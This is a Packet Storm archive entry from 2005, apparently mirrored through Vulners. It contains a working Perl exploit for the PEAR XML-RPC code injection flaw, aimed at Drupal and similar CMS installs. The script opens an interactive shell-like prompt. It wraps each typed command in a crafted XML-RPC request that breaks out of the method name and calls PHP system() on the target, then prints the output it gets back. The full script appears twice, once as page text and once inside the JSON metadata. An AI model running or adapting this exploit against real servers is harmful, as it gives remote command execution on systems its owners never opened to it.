Search...

pearxmlrpc.pl.txt

2005-07-07T00:00:00

ID PACKETSTORM:38476
Type packetstorm
Reporter Packet Storm
Modified 2005-07-07T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#   
# ilo--   
#  
# This program is no GPL or has nothing to do with FSF, but some  
# code was ripped from romansoft.. sorry, too lazy!  
#   
# xmlrpc bug by James from GulfTech Security Research.   
# http://pear.php.net/bugs/bug.php?id=4692  
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other  
# cms should be vulnerable.  
#  
# greets: !dSR digitalsec.net  
#  
require LWP::UserAgent;  
use URI;  
use Getopt::Long;  
use strict;  
$| = 1; # fflush stdout after print  
  
# Default options  
# connection   
my $basic_auth_user = '';  
my $basic_auth_pass = '';  
my $proxy = '';  
my $proxy_user = '';  
my $proxy_pass = '';  
my $conn_timeout = 15;  
  
# general  
my $host;  
  
#informational lines to feed my own ego.  
print "xmlrpc exploit - http://www.reversing.org \n";  
print "2005 ilo-- &lt;ilo".chr(64)."reversing.org&gt; \n";  
print "special chars allowed are / and - \n\n";  
  
# read command line options  
my $options = GetOptions (  
  
#general options  
'host=s' =&gt; \$host, # input host to test.  
  
# connection options  
'basic_auth_user=s' =&gt; \$basic_auth_user,  
'basic_auth_pass=s' =&gt; \$basic_auth_pass,  
'proxy=s' =&gt; \$proxy,  
'proxy_user=s' =&gt; \$proxy_user,  
'proxy_pass=s' =&gt; \$proxy_pass,  
'timeout=i' =&gt; \$conn_timeout);  
  
# command line sanity check   
&show_usage unless ($host);  
  
# main loop   
while (1){  
print "\nxmlrpc@# ";  
my $cmd = &lt;STDIN&gt;;  
xmlrpc_xploit ($cmd);  
}  
  
exit (1);  
  
#exploit   
sub xmlrpc_xploit {  
chomp (my $data = shift);  
my $reply;  
  
my $d1 = "&lt;?xml version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;examples.getStateName&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;name&gt;a');";   
my $d2 = ";//&lt;/name&gt;&lt;value&gt;xml exploit R/01&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;";  
  
$data =~ s/-/'.chr(45).'/mg;  
$data =~ s/\//'.char(47).'/mg;  
  
my $req = new HTTP::Request 'POST' =&gt; $host;  
$req-&gt;content_type('application/xml');  
$req-&gt;content($d1.'system(\''.$data.'\')'.$d2);  
  
my $ua = new LWP::UserAgent;  
$ua-&gt;agent("xmlrpc exploit R/0.1");  
$ua-&gt;timeout($conn_timeout);  
  
if ($basic_auth_user){  
$req-&gt;authorization_basic($basic_auth_user, $basic_auth_pass)   
}  
if ($proxy){  
$ua-&gt;proxy(['http'] =&gt; $proxy);  
$req-&gt;proxy_authorization_basic($proxy_user, $proxy_pass);  
}  
  
#send request, return null if not OK  
my $res = $ua-&gt;request($req);  
if ($res-&gt;is_success){  
$reply= $res-&gt;content;  
} else {   
$reply = "";  
}  
$reply =~ /(.*).(&lt;pre&gt;warning.*)/mgsi;  
print ($1);  
}  
  
# show options   
sub show_usage {  
print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";  
print "main options\n";  
print "connection options\n";  
print "\t--proxy (http), --proxy_user, --proxy_pass\n";  
print "\t--basic_auth_user, --basic_auth_pass\n";  
print "\t--timeout \n";  
print "\nExample\n";  
print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";  
print "\n";  
exit(1);  
}  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:38476", "type": "packetstorm", "bulletinFamily": "exploit", "title": "pearxmlrpc.pl.txt", "description": "", "published": "2005-07-07T00:00:00", "modified": "2005-07-07T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/38476/pearxmlrpc.pl.txt.html", "reporter": "Packet Storm", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:51", "viewCount": 0, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:16:51", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:51", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/38476/pearxmlrpc.pl.txt", "sourceData": "`#!/usr/bin/perl \n# \n# ilo-- \n# \n# This program is no GPL or has nothing to do with FSF, but some \n# code was ripped from romansoft.. sorry, too lazy! \n# \n# xmlrpc bug by James from GulfTech Security Research. \n# http://pear.php.net/bugs/bug.php?id=4692 \n# xmlrpc drupal exploit, but James sais xoops, phpnuke and other \n# cms should be vulnerable. \n# \n# greets: !dSR digitalsec.net \n# \nrequire LWP::UserAgent; \nuse URI; \nuse Getopt::Long; \nuse strict; \n$| = 1; # fflush stdout after print \n \n# Default options \n# connection \nmy $basic_auth_user = ''; \nmy $basic_auth_pass = ''; \nmy $proxy = ''; \nmy $proxy_user = ''; \nmy $proxy_pass = ''; \nmy $conn_timeout = 15; \n \n# general \nmy $host; \n \n#informational lines to feed my own ego. \nprint \"xmlrpc exploit - http://www.reversing.org \\n\"; \nprint \"2005 ilo-- <ilo\".chr(64).\"reversing.org> \\n\"; \nprint \"special chars allowed are / and - \\n\\n\"; \n \n# read command line options \nmy $options = GetOptions ( \n \n#general options \n'host=s' => \\$host, # input host to test. \n \n# connection options \n'basic_auth_user=s' => \\$basic_auth_user, \n'basic_auth_pass=s' => \\$basic_auth_pass, \n'proxy=s' => \\$proxy, \n'proxy_user=s' => \\$proxy_user, \n'proxy_pass=s' => \\$proxy_pass, \n'timeout=i' => \\$conn_timeout); \n \n# command line sanity check \n&show_usage unless ($host); \n \n# main loop \nwhile (1){ \nprint \"\\nxmlrpc@# \"; \nmy $cmd = <STDIN>; \nxmlrpc_xploit ($cmd); \n} \n \nexit (1); \n \n#exploit \nsub xmlrpc_xploit { \nchomp (my $data = shift); \nmy $reply; \n \nmy $d1 = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');\"; \nmy $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCall>\"; \n \n$data =~ s/-/'.chr(45).'/mg; \n$data =~ s/\\//'.char(47).'/mg; \n \nmy $req = new HTTP::Request 'POST' => $host; \n$req->content_type('application/xml'); \n$req->content($d1.'system(\\''.$data.'\\')'.$d2); \n \nmy $ua = new LWP::UserAgent; \n$ua->agent(\"xmlrpc exploit R/0.1\"); \n$ua->timeout($conn_timeout); \n \nif ($basic_auth_user){ \n$req->authorization_basic($basic_auth_user, $basic_auth_pass) \n} \nif ($proxy){ \n$ua->proxy(['http'] => $proxy); \n$req->proxy_authorization_basic($proxy_user, $proxy_pass); \n} \n \n#send request, return null if not OK \nmy $res = $ua->request($req); \nif ($res->is_success){ \n$reply= $res->content; \n} else { \n$reply = \"\"; \n} \n$reply =~ /(.*).(<pre>warning.*)/mgsi; \nprint ($1); \n} \n \n# show options \nsub show_usage { \nprint \"Syntax: ./xmlrpc.pl [options] host/uri\\n\\n\"; \nprint \"main options\\n\"; \nprint \"connection options\\n\"; \nprint \"\\t--proxy (http), --proxy_user, --proxy_pass\\n\"; \nprint \"\\t--basic_auth_user, --basic_auth_pass\\n\"; \nprint \"\\t--timeout \\n\"; \nprint \"\\nExample\\n\"; \nprint \"bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \\n\"; \nprint \"\\n\"; \nexit(1); \n} \n`\n", "immutableFields": []}